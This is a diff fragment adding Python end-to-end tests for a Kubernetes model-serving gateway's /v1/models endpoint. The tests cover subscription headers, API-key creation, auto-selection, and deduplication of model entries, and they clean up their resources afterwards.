+            log.info("Waiting 30s for Authorino to sync auth policies...")
+            time.sleep(30)
+
+            # DEBUG: Test model endpoint directly first
+            log.info("DEBUG: Testing direct model endpoint access...")
+            model_endpoint = f"https://{os.environ['GATEWAY_HOST']}/llm/{DISTINCT_MODEL_REF}/v1/models"
+            debug_r = requests.get(
+                model_endpoint,
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                    "x-maas-subscription": subscription_name,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            log.info(f"DEBUG: Direct model endpoint returned {debug_r.status_code}")
+            if debug_r.status_code == 200:
+                log.info(f"DEBUG: Direct model endpoint data: {debug_r.json()}")
+            else:
+                log.info(f"DEBUG: Direct model endpoint error: {debug_r.text}")
+
+            # Poll /v1/models until it returns models or timeout
+            log.info("Testing: GET /v1/models with single subscription (no header, auto-select)")
+            url = f"{_maas_api_url()}/v1/models"
+
+            timeout_seconds = 60
+            poll_interval = 2
+            deadline = time.time() + timeout_seconds
+            r = None
+
+            while time.time() < deadline:
+                r = requests.get(
+                    url,
+                    headers={"Authorization": f"Bearer {api_key}"},
+                    timeout=TIMEOUT,
+                    verify=TLS_VERIFY,
+                )
+
+                if r.status_code == 200:
+                    models = (r.json().get("data") or [])
+                    if len(models) > 0:
+                        log.info(f"✅ Models available after {60 - int(deadline - time.time())}s")
+                        break
+                    log.info(f"Got 200 but no models yet, retrying... ({int(deadline - time.time())}s remaining)")
+                else:
+                    log.info(f"Got {r.status_code}, retrying... ({int(deadline - time.time())}s remaining)")
+
+                time.sleep(poll_interval)
+
+            assert r is not None and r.status_code == 200, f"Expected 200 for single subscription auto-select, got {r.status_code if r else 'timeout'}: {r.text if r else 'no response'}"
+
+            # Validate response structure
+            data = r.json()
+            assert data.get("object") == "list", f"Expected object='list', got {data.get('object')}"
+            assert "data" in data, "Response missing 'data' field"
+
+            # Handle API bug: data may be null instead of []
+            models = data.get("data") or []
+
+            # Should have at least one model (facebook-opt-125m-simulated from simulator-subscription)
+            assert len(models) > 0, f"Expected at least one model in response, got {len(models)}. Data was: {data.get('data')}"
+
+            # Validate model structure
+            for model in models:
+                assert "id" in model, "Model missing 'id' field"
+                assert "object" in model, "Model missing 'object' field"
+                assert "created" in model, "Model missing 'created' field"
+                assert "owned_by" in model, "Model missing 'owned_by' field"
+
+                # Validate subscriptions field (new feature)
+                assert "subscriptions" in model, "Model missing 'subscriptions' field"
+                assert isinstance(model["subscriptions"], list), "subscriptions should be a list"
+                assert len(model["subscriptions"]) == 1, \
+                    f"Expected 1 subscription (auto-selected), got {len(model['subscriptions'])}"
+                assert model["subscriptions"][0]["name"] == subscription_name, \
+                    f"Expected subscription '{subscription_name}', got '{model['subscriptions'][0]['name']}'"
+
+            log.info(f"✅ Single subscription auto-select → {r.status_code} with {len(models)} model(s)")
+
+        finally:
+            # Restore simulator-subscription first (critical for other tests)
+            if original_sim:
+                _apply_cr(original_sim)
+
+            # Clean up test resources
+            _delete_cr("maasauthpolicy", auth_policy_name, namespace=maas_ns)
+            _delete_cr("maassubscription", subscription_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+            _wait_reconcile()
+
+    def test_explicit_subscription_header(self):
+        """
+        Test: K8s token with multiple subscriptions can list models by providing
+        x-maas-subscription header.
+
+        Expected: HTTP 200 with models from only the specified subscription.
+
+        Note: Creates SA that has access to both simulator-subscription (via system:authenticated)
+        and premium-simulator-subscription (by adding SA to its users list).
+        Uses K8s token directly (not API key) since API keys ignore the header.
+        """
+        sa_name = "e2e-models-explicit-header-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        sa_user = None
+
+        try:
+            # Create service account - will be in system:authenticated group
+            # This gives access to simulator-subscription automatically
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Add SA to premium-simulator-subscription to give it access to a second subscription
+            log.info(f"Adding {sa_user} to premium-simulator-subscription users")
+            subprocess.run([
+                "kubectl", "patch", "maassubscription", "premium-simulator-subscription",
+                "-n", maas_ns,
+                "--type=json",
+                "-p", f'[{{"op": "add", "path": "/spec/owner/users/-", "value": "{sa_user}"}}]'
+            ], check=True)
+
+            _wait_reconcile()
+
+            # Test: GET /v1/models WITH x-maas-subscription header using K8s token
+            # Expected: Returns models from simulator-subscription only
+            log.info("Testing: GET /v1/models with K8s token and explicit subscription header: simulator-subscription")
+            url = f"{_maas_api_url()}/v1/models"
+            r = requests.get(
+                url,
+                headers={
+                    "Authorization": f"Bearer {sa_token}",  # K8s token, not API key
+                    "x-maas-subscription": "simulator-subscription",
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, f"Expected 200 with explicit subscription header, got {r.status_code}: {r.text}"
+
+            # Validate response structure
+            data = r.json()
+            assert data.get("object") == "list", f"Expected object='list', got {data.get('object')}"
+            assert "data" in data, "Response missing 'data' field"
+            models = data.get("data", []) if data.get("data") is not None else []
+
+            # Should have at least one model from simulator-subscription
+            assert len(models) > 0, f"Expected at least one model in response, got {len(models)}. Data was: {data.get('data')}"
+
+            # Validate subscriptions field
+            for model in models:
+                assert "subscriptions" in model, "Model missing 'subscriptions' field"
+                assert isinstance(model["subscriptions"], list), "subscriptions should be a list"
+                assert len(model["subscriptions"]) == 1, \
+                    f"Expected 1 subscription (explicit header), got {len(model['subscriptions'])}"
+                assert model["subscriptions"][0]["name"] == "simulator-subscription", \
+                    f"Expected 'simulator-subscription', got '{model['subscriptions'][0]['name']}'"
+
+            log.info(f"✅ K8s token with explicit subscription header → {r.status_code} with {len(models)} model(s)")
+
+        finally:
+            # Remove SA from premium-simulator-subscription
+            if sa_user is not None:
+                log.info(f"Removing {sa_user} from premium-simulator-subscription users")
+                # Get current users list, remove our SA, then patch
+                result = subprocess.run([
+                    "kubectl", "get", "maassubscription", "premium-simulator-subscription",
+                    "-n", maas_ns, "-o", "jsonpath={.spec.owner.users}"
+                ], capture_output=True, text=True)
+
+                if sa_user in result.stdout:
+                    users = json.loads(result.stdout) if result.stdout and result.stdout.strip() else []
+                    users = [u for u in users if u != sa_user]
+                    subprocess.run([
+                        "kubectl", "patch", "maassubscription", "premium-simulator-subscription",
+                        "-n", maas_ns,
+                        "--type=merge",
+                        "-p", json.dumps({"spec": {"owner": {"users": users}}})
+                    ], check=True)
+
+            _delete_sa(sa_name, namespace=sa_ns)
+            _wait_reconcile()
+
+    def test_empty_subscription_header_value(self):
+        """
+        Test 12: Empty subscription header value behaves correctly.
+
+        Header present but empty should behave like missing header (auto-select or 403).
+        """
+        log.info("Test 12: Empty subscription header value")
+
+        sa_name = "e2e-models-empty-header-sa"
+        sa_ns = "default"
+        api_key = None
+
+        try:
+            # Create SA and API key with access to only one subscription
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+
+            api_key_response = requests.post(
+                f"{_maas_api_url()}/v1/api-keys",
+                headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"},
+                json={"name": "e2e-empty-header-test-key"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert api_key_response.status_code in (200, 201)
+            api_key = api_key_response.json().get("key")
+
+            _wait_reconcile()
+
+            # Test with empty header value
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                    "x-maas-subscription": "",  # Empty string
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            # Should behave same as no header (auto-select single subscription)
+            assert r.status_code == 200, \
+                f"Empty header should auto-select single subscription, got {r.status_code}: {r.text}"
+
+            data = r.json()
+            assert data.get("object") == "list"
+
+            log.info(f"✅ Empty subscription header → {r.status_code} (auto-selected)")
+
+        finally:
+            _delete_sa(sa_name, namespace=sa_ns)
+
+    def test_models_filtered_by_subscription(self):
+        """
+        Test 8: Models are correctly filtered by subscription.
+
+        User with access to multiple subscriptions should only see models from
+        the subscription specified in x-maas-subscription header.
+        """
+        log.info("Test 8: Models filtered by subscription")
+
+        sa_name = "e2e-models-filtered-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        api_key = None
+        sa_user = None
+
+        try:
+            # Create SA with access to both subscriptions
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Add SA to premium subscription
+            log.info(f"Adding {sa_user} to premium-simulator-subscription")
+            subprocess.run([
+                "kubectl", "patch", "maassubscription", "premium-simulator-subscription",
+                "-n", maas_ns,
+                "--type=json",
+                "-p", f'[{{"op": "add", "path": "/spec/owner/users/-", "value": "{sa_user}"}}]'
+            ], check=True)
+
+            # Create API key
+            api_key_response = requests.post(
+                f"{_maas_api_url()}/v1/api-keys",
+                headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"},
+                json={"name": "e2e-filtered-test-key"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert api_key_response.status_code in (200, 201)
+            api_key = api_key_response.json().get("key")
+
+            _wait_reconcile()
+
+            # Get models from simulator-subscription
+            r_simulator = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                    "x-maas-subscription": "simulator-subscription",
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert r_simulator.status_code == 200
+            simulator_models = r_simulator.json().get("data") or []
+            simulator_model_ids = {m["id"] for m in simulator_models}
+
+            # Get models from premium-simulator-subscription
+            r_premium = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                    "x-maas-subscription": "premium-simulator-subscription",
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert r_premium.status_code == 200
+            premium_models = r_premium.json().get("data") or []
+            premium_model_ids = {m["id"] for m in premium_models}
+
+            # Verify models are different between subscriptions
+            # (assuming premium has different models than free tier)
+            log.info(f"Simulator models: {simulator_model_ids}")
+            log.info(f"Premium models: {premium_model_ids}")
+
+            # The key assertion: models are subscription-specific
+            # If there's any overlap, that's fine, but each list should be filtered
+            # At minimum, verify we got responses for both
+            assert len(simulator_models) >= 0, "Should get response for simulator subscription"
+            assert len(premium_models) >= 0, "Should get response for premium subscription"
+
+            log.info(f"✅ Models filtered by subscription → simulator: {len(simulator_models)}, premium: {len(premium_models)}")
+
+        finally:
+            # Cleanup
+            if sa_user is not None:
+                result = subprocess.run([
+                    "kubectl", "get", "maassubscription", "premium-simulator-subscription",
+                    "-n", maas_ns, "-o", "jsonpath={.spec.owner.users}"
+                ], capture_output=True, text=True)
+
+                if sa_user in result.stdout:
+                    users = json.loads(result.stdout) if result.stdout and result.stdout.strip() else []
+                    users = [u for u in users if u != sa_user]
+                    subprocess.run([
+                        "kubectl", "patch", "maassubscription", "premium-simulator-subscription",
+                        "-n", maas_ns,
+                        "--type=merge",
+                        "-p", json.dumps({"spec": {"owner": {"users": users}}})
+                    ], check=True)
+
+            _delete_sa(sa_name, namespace=sa_ns)
+
+    def test_deduplication_same_model_multiple_refs(self):
+        """
+        Test 6: Same modelRef listed twice should deduplicate to 1 entry.
+
+        Creates a subscription with the SAME modelRef listed TWICE (different rate limits).
+        The API deduplicates by (model ID, URL) and returns only 1 entry since both
+        references point to the same backend service.
+
+        The response includes subscription information showing which subscription(s)
+        provide access to the model.
+        """
+        log.info("Test 6: Same modelRef twice should deduplicate (INTENDED behavior)")
+
+        sa_name = "e2e-models-dedup-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        subscription_name = "e2e-dedup-subscription"
+        auth_policy_name = "e2e-dedup-auth"
+        api_key = None
+
+        try:
+            # Create SA with its own token
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Create auth policy that grants access to the model
+            log.info(f"Creating auth policy with access to {MODEL_REF}")
+            auth_policy_cr = {
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSAuthPolicy",
+                "metadata": {
+                    "name": auth_policy_name,
+                    "namespace": maas_ns,
+                },
+                "spec": {
+                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}],
+                    "subjects": {
+                        "users": [sa_user],
+                        "groups": [],
+                    },
+                },
+            }
+            subprocess.run(
+                ["kubectl", "apply", "-f", "-"],
+                input=json.dumps(auth_policy_cr),
+                text=True,
+                check=True,
+            )
+
+            # Create subscription with the SAME model ref TWICE (guaranteed duplicates)
+            log.info(f"Creating subscription with {MODEL_REF} listed twice (to test deduplication)")
+            subscription_cr = {
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSSubscription",
+                "metadata": {
+                    "name": subscription_name,
+                    "namespace": maas_ns,
+                },
+                "spec": {
+                    "owner": {
+                        "users": [sa_user],
+                        "groups": [],
+                    },
+                    "modelRefs": [
+                        {
+                            "name": MODEL_REF,
+                            "namespace": MODEL_NAMESPACE,
+                            "tokenRateLimits": [{"limit": 100, "window": "1m"}],
+                        },
+                        {
+                            "name": MODEL_REF,  # Same model ref again - guarantees duplicate
+                            "namespace": MODEL_NAMESPACE,
+                            "tokenRateLimits": [{"limit": 200, "window": "1m"}],
+                        },
+                    ],
+                },
+            }
+            subprocess.run(
+                ["kubectl", "apply", "-f", "-"],
+                input=json.dumps(subscription_cr),
+                text=True,
+                check=True,
+            )
+
+            # Create API key bound to our test subscription
+            api_key_response = requests.post(
+                f"{_maas_api_url()}/v1/api-keys",
+                headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"},
+                json={"name": "e2e-dedup-test-key", "subscription": subscription_name},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert api_key_response.status_code in (200, 201)
+            api_key = api_key_response.json().get("key")
+
+            # Wait for reconciliation
+            _wait_reconcile()
+
+            # Query /v1/models with our custom subscription
+            log.info(f"Querying /v1/models with subscription: {subscription_name}")
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                    "x-maas-subscription": subscription_name,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}"
+            data = r.json()
+            models = data.get("data") or []
+
+            # Models should be a list
+            assert isinstance(models, list), "Models should be a list"
+
+            # Get model IDs from response
+            model_ids = [m["id"] for m in models]
+            unique_ids = set(model_ids)
+
+            log.info(f"📊 API Response: {len(models)} total model(s), {len(unique_ids)} unique ID(s)")
+            log.info(f"   Model IDs: {model_ids}")
+            log.info(f"   Unique IDs: {unique_ids}")
+
+            # Should all be the same model ID (we only referenced one modelRef)
+            assert len(unique_ids) == 1, \
+                f"Expected only 1 unique model ID (same modelRef listed twice), got {len(unique_ids)}: {unique_ids}"
+
+            # INTENDED BEHAVIOR: Should return exactly 1 entry (deduplicated)
+            # even though the same modelRef was listed twice
+            assert len(models) == 1, \
+                f"Expected 1 deduplicated entry (same modelRef listed 2x), got {len(models)} duplicates: {model_ids}"
+
+            # Validate subscriptions field
+            model = models[0]
+            assert "subscriptions" in model, "Model should have 'subscriptions' field"
+            assert isinstance(model["subscriptions"], list), "subscriptions should be a list"
+            assert len(model["subscriptions"]) == 1, \
+                f"Expected 1 subscription (single subscription requested), got {len(model['subscriptions'])}"
+
+            sub = model["subscriptions"][0]
+            assert "name" in sub, "Subscription should have 'name' field"
+            assert sub["name"] == subscription_name, \
+                f"Expected subscription name '{subscription_name}', got '{sub['name']}'"
+            # displayName and description are optional
+            assert isinstance(sub.get("displayName", ""), str), "displayName should be string if present"
+            assert isinstance(sub.get("description", ""), str), "description should be string if present"
+
+            log.info("✅ API correctly deduplicated same modelRef listed 2x → 1 entry with subscription info")
+
+        finally:
+            # Cleanup
+            _delete_cr("maassubscription", subscription_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth_policy_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+            _wait_reconcile()
+
+    def test_different_modelrefs_same_model_id(self):
+        """
+        Test 7: Different modelRefs serving same model ID return separate entries.
+
+        Uses two DIFFERENT MaaSModelRefs (each listed ONCE) that both serve the
+        SAME model ID:
+        - MODEL_REF (facebook-opt-125m-simulated) → serves "facebook/opt-125m"
+        - PREMIUM_MODEL_REF (premium-simulated-simulated-premium) → serves "facebook/opt-125m"
+
+        The API deduplicates by (model ID, URL). Since these are different backend
+        services with different URLs, they return as 2 separate entries even though
+        they serve the same model ID.
+
+        Each entry shows the same model ID but different URL and subscription.
+        """
+        log.info("Test 7: Different modelRefs same ID should deduplicate (INTENDED behavior)")
+
+        sa_name = "e2e-models-diff-refs-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        subscription_name = "e2e-diff-refs-subscription"
+        auth_policy_name = "e2e-diff-refs-auth"
+        api_key = None
+
+        try:
+            # Create SA
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Create auth policy with both modelRefs
+            log.info(f"Creating auth policy with {MODEL_REF} and {PREMIUM_MODEL_REF}")
+            auth_policy_cr = {
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSAuthPolicy",
+                "metadata": {
+                    "name": auth_policy_name,
+                    "namespace": maas_ns,
+                },
+                "spec": {
+                    "modelRefs": [
+                        {"name": MODEL_REF, "namespace": MODEL_NAMESPACE},
+                        {"name": PREMIUM_MODEL_REF, "namespace": MODEL_NAMESPACE},
+                    ],
+                    "subjects": {
+                        "users": [sa_user],
+                        "groups": [],
+                    },
+                },
+            }
+            subprocess.run(
+                ["kubectl", "apply", "-f", "-"],
+                input=json.dumps(auth_policy_cr),
+                text=True,
+                check=True,
+            )
+
+            # Create subscription with both modelRefs (each listed ONCE)
+            log.info(f"Creating subscription with {MODEL_REF} and {PREMIUM_MODEL_REF}")
+            subscription_cr = {
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSSubscription",
+                "metadata": {
+                    "name": subscription_name,
+                    "namespace": maas_ns,
+                },
+                "spec": {
+                    "owner": {
+                        "users": [sa_user],
+                        "groups": [],
+                    },
+                    "modelRefs": [
+                        {
+                            "name": MODEL_REF,
+                            "namespace": MODEL_NAMESPACE,
+                            "tokenRateLimits": [{"limit": 100, "window": "1m"}],
+                        },
+                        {
+                            "name": PREMIUM_MODEL_REF,
+                            "namespace": MODEL_NAMESPACE,
+                            "tokenRateLimits": [{"limit": 200, "window": "1m"}],
+                        },
+                    ],
+                },
+            }
+            subprocess.run(
+                ["kubectl", "apply", "-f", "-"],
+                input=json.dumps(subscription_cr),
+                text=True,
+                check=True,
+            )
+
+            # Create API key bound to our test subscription
+            api_key_response = requests.post(
+                f"{_maas_api_url()}/v1/api-keys",
+                headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"},
+                json={"name": "e2e-diff-refs-test-key", "subscription": subscription_name},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert api_key_response.status_code in (200, 201)
+            api_key = api_key_response.json().get("key")
+
+            _wait_reconcile()
+
+            # Query /v1/models
+            log.info(f"Querying /v1/models with subscription: {subscription_name}")
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                    "x-maas-subscription": subscription_name,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}"
+            data = r.json()
+            models = data.get("data") or []
+
+            assert isinstance(models, list), "Models should be a list"
+
+            # Get model IDs from response
+            model_ids = [m["id"] for m in models]
+            unique_ids = set(model_ids)
+
+            log.info(f"📊 API Response: {len(models)} total model(s), {len(unique_ids)} unique ID(s)")
+            log.info(f"   Model IDs: {model_ids}")
+            log.info(f"   Unique IDs: {unique_ids}")
+            log.info("   Subscription had: 2 different modelRefs both serving 'facebook/opt-125m'")
+
+            # Both modelRefs serve the same model ID
+            assert len(unique_ids) == 1, \
+                f"Expected only 1 unique model ID (both modelRefs serve facebook/opt-125m), got {len(unique_ids)}: {unique_ids}"
+
+            # Verify it's the expected model ID
+            expected_id = "facebook/opt-125m"
+            assert expected_id in unique_ids, \
+                f"Expected to find '{expected_id}', but got {unique_ids}"
+
+            # INTENDED BEHAVIOR: Should return 2 entries (deduplication by model ID + URL)
+            # Different backend services (different URLs) return separate entries even with same model ID
+            assert len(models) == 2, \
+                f"Expected 2 entries (different URLs), got {len(models)}: {model_ids}"
+
+            # Validate both entries have different URLs
+            urls = [m["url"] for m in models if "url" in m]
+            assert len(urls) == 2, f"Expected 2 URLs, got {len(urls)}"
+            assert urls[0] != urls[1], f"Expected different URLs, got duplicates: {urls}"
+
+            # Validate each entry has subscriptions field with the same subscription
+            for model in models:
+                assert "subscriptions" in model, "Model should have 'subscriptions' field"
+                assert isinstance(model["subscriptions"], list), "subscriptions should be a list"
+                assert len(model["subscriptions"]) == 1, \
+                    f"Expected 1 subscription per model, got {len(model['subscriptions'])}"
+                assert model["subscriptions"][0]["name"] == subscription_name, \
+                    f"Expected subscription '{subscription_name}', got '{model['subscriptions'][0]['name']}'"
+
+            log.info("✅ API correctly returned 2 separate entries (different URLs) for same model ID")
+
+        finally:
+            # Cleanup
+            _delete_cr("maassubscription", subscription_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth_policy_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+            _wait_reconcile()
+
+    def test_multiple_distinct_models_in_subscription(self):
+        """
+        Test 8: Multiple distinct models should return exactly 2 entries (1 per unique ID).
+
+        Uses pre-deployed models (both known to not have backend duplication issues):
+        - DISTINCT_MODEL_REF (simulated-distinct) serving "test/e2e-distinct-model"
+        - DISTINCT_MODEL_2_REF (simulated-distinct-2) serving "test/e2e-distinct-model-2"
+
+        Creates a subscription with both models. The API should return exactly 2 entries
+        (one for each distinct model ID), with no duplicates.
+
+        This test validates that when backend models don't have duplication bugs, the
+        API correctly returns one entry per distinct model ID.
+        """
+        log.info("Test 8: Multiple distinct models should return 2 entries")
+
+        sa_name = "e2e-models-distinct-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        subscription_name = "e2e-distinct-models-subscription"
+        auth_policy_name = "e2e-distinct-models-auth"
+        api_key = None
+
+        try:
+            # Create SA
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Create auth policy with both distinct models
+            log.info(f"Creating auth policy with {DISTINCT_MODEL_REF} and {DISTINCT_MODEL_2_REF}")
+            auth_policy_cr = {
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSAuthPolicy",
+                "metadata": {
+                    "name": auth_policy_name,
+                    "namespace": maas_ns,
+                },
+                "spec": {
+                    "modelRefs": [
+                        {"name": DISTINCT_MODEL_REF, "namespace": MODEL_NAMESPACE},
+                        {"name": DISTINCT_MODEL_2_REF, "namespace": MODEL_NAMESPACE},
+                    ],
+                    "subjects": {
+                        "users": [sa_user],
+                        "groups": [],
+                    },
+                },
+            }
+            subprocess.run(
+                ["kubectl", "apply", "-f", "-"],
+                input=json.dumps(auth_policy_cr),
+                text=True,
+                check=True,
+            )
+
+            # Create subscription with both distinct models
+            log.info(f"Creating subscription with {DISTINCT_MODEL_REF} and {DISTINCT_MODEL_2_REF}")
+            subscription_cr = {
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSSubscription",
+                "metadata": {
+                    "name": subscription_name,
+                    "namespace": maas_ns,
+                },
+                "spec": {
+                    "owner": {
+                        "users": [sa_user],
+                        "groups": [],
+                    },
+                    "modelRefs": [
+                        {
+                            "name": DISTINCT_MODEL_REF,
+                            "namespace": MODEL_NAMESPACE,
+                            "tokenRateLimits": [{"limit": 100, "window": "1m"}],
+                        },
+                        {
+                            "name": DISTINCT_MODEL_2_REF,
+                            "namespace": MODEL_NAMESPACE,
+                            "tokenRateLimits": [{"limit": 100, "window": "1m"}],
+                        },
+                    ],
+                },
+            }
+            subprocess.run(
+                ["kubectl", "apply", "-f", "-"],
+                input=json.dumps(subscription_cr),
+                text=True,
+                check=True,
+            )
+
+            # Create API key bound to our test subscription
+            api_key_response = requests.post(
+                f"{_maas_api_url()}/v1/api-keys",
+                headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"},
+                json={"name": "e2e-distinct-models-test-key", "subscription": subscription_name},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert api_key_response.status_code in (200, 201)
+            api_key = api_key_response.json().get("key")
+
+            _wait_reconcile()
+
+            # Query /v1/models
+            log.info(f"Querying /v1/models with subscription: {subscription_name}")
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {api_key}",
+                    "x-maas-subscription": subscription_name,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}"
+            data = r.json()
+            models = data.get("data") or []
+
+            assert isinstance(models, list), "Models should be a list"
+
+            # Get model IDs from response
+            model_ids = [m["id"] for m in models]
+            unique_ids = set(model_ids)
+
+            log.info(f"📊 API Response: {len(models)} total model(s), {len(unique_ids)} unique ID(s)")
+            log.info(f"   Model IDs: {model_ids}")
+            log.info(f"   Unique IDs: {unique_ids}")
+            log.info(f"   Subscription had: 2 modelRefs ({DISTINCT_MODEL_REF}, {DISTINCT_MODEL_2_REF})")
+
+            # Verify we got BOTH expected model IDs
+            expected_ids = {DISTINCT_MODEL_ID, DISTINCT_MODEL_2_ID}
+            assert unique_ids == expected_ids, \
+                f"Expected to find both distinct models {expected_ids}, but got {unique_ids}"
+
+            # INTENDED BEHAVIOR: Should return exactly 2 entries (one per distinct model ID)
+            # No duplicates should be present
+            assert len(models) == 2, \
+                f"Expected 2 entries (one per distinct model ID), got {len(models)}: {model_ids}"
+
+            assert len(model_ids) == len(unique_ids), \
+                f"Expected no duplicates, but got {len(model_ids)} entries for {len(unique_ids)} unique IDs: {model_ids}"
+
+            # Validate subscriptions field
+            for model in models:
+                assert "subscriptions" in model, f"Model {model['id']} missing 'subscriptions' field"
+                assert isinstance(model["subscriptions"], list), "subscriptions should be a list"
+                assert len(model["subscriptions"]) == 1, \
+                    f"Expected 1 subscription, got {len(model['subscriptions'])}"
+                assert model["subscriptions"][0]["name"] == subscription_name, \
+                    f"Expected subscription '{subscription_name}', got '{model['subscriptions'][0]['name']}'"
+
+            log.info(f"✅ API correctly returned 2 distinct models without duplicates: {sorted(unique_ids)}")
+
+        finally:
+            # Cleanup
+            _delete_cr("maassubscription", subscription_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth_policy_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+            _wait_reconcile()
+
+    def test_user_token_returns_all_models(self):
+        """
+        Test: User token automatically returns models from all subscriptions.
+
+        Creates a user with access to TWO subscriptions containing different models.
+        Queries without X-MaaS-Subscription header and validates:
+        - Returns models from ALL accessible subscriptions
+        - Each model includes subscriptions array showing which subscription(s) provide access
+        - Models appearing in multiple subscriptions have aggregated subscription list
+        """
+        log.info("Test: User token returns models from all subscriptions")
+
+        sa_name = "e2e-return-all-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        sub1_name = "e2e-return-all-sub1"
+        sub2_name = "e2e-return-all-sub2"
+        auth1_name = "e2e-return-all-auth1"
+        auth2_name = "e2e-return-all-auth2"
+
+        try:
+            # Create SA
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Create subscription 1 with DISTINCT_MODEL_REF
+            log.info(f"Creating subscription 1 with {DISTINCT_MODEL_REF}")
+            _create_test_auth_policy(auth1_name, DISTINCT_MODEL_REF, users=[sa_user])
+            _create_test_subscription(sub1_name, DISTINCT_MODEL_REF, users=[sa_user])
+
+            # Create subscription 2 with DISTINCT_MODEL_2_REF
+            log.info(f"Creating subscription 2 with {DISTINCT_MODEL_2_REF}")
+            _create_test_auth_policy(auth2_name, DISTINCT_MODEL_2_REF, users=[sa_user])
+            _create_test_subscription(sub2_name, DISTINCT_MODEL_2_REF, users=[sa_user])
+
+            _wait_reconcile()
+
+            # Query with user token (no X-MaaS-Subscription header)
+            log.info("Querying /v1/models with user token (no header)")
+            r = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {sa_token}",
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}"
+            data = r.json()
+            models = data.get("data") or []
+
+            # Should get models from BOTH subscriptions
+            model_ids = [m["id"] for m in models]
+            log.info(f"Got {len(models)} models: {model_ids}")
+
+            # Validate we got models from both subscriptions
+            # (At minimum we should see the 2 distinct models)
+            assert len(models) >= 2, \
+                f"Expected at least 2 models (from 2 subscriptions), got {len(models)}"
+
+            # Validate all models have subscriptions field
+            for model in models:
+                assert "subscriptions" in model, f"Model {model['id']} missing 'subscriptions' field"
+                assert isinstance(model["subscriptions"], list), \
+                    f"Model {model['id']} subscriptions should be a list"
+                assert len(model["subscriptions"]) > 0, \
+                    f"Model {model['id']} should have at least one subscription"
+
+                # Validate subscription structure
+                for sub in model["subscriptions"]:
+                    assert "name" in sub, "Subscription should have 'name' field"
+                    assert isinstance(sub["name"], str), "Subscription name should be string"
+
+            log.info(f"✅ User token returned {len(models)} models from all subscriptions")
+
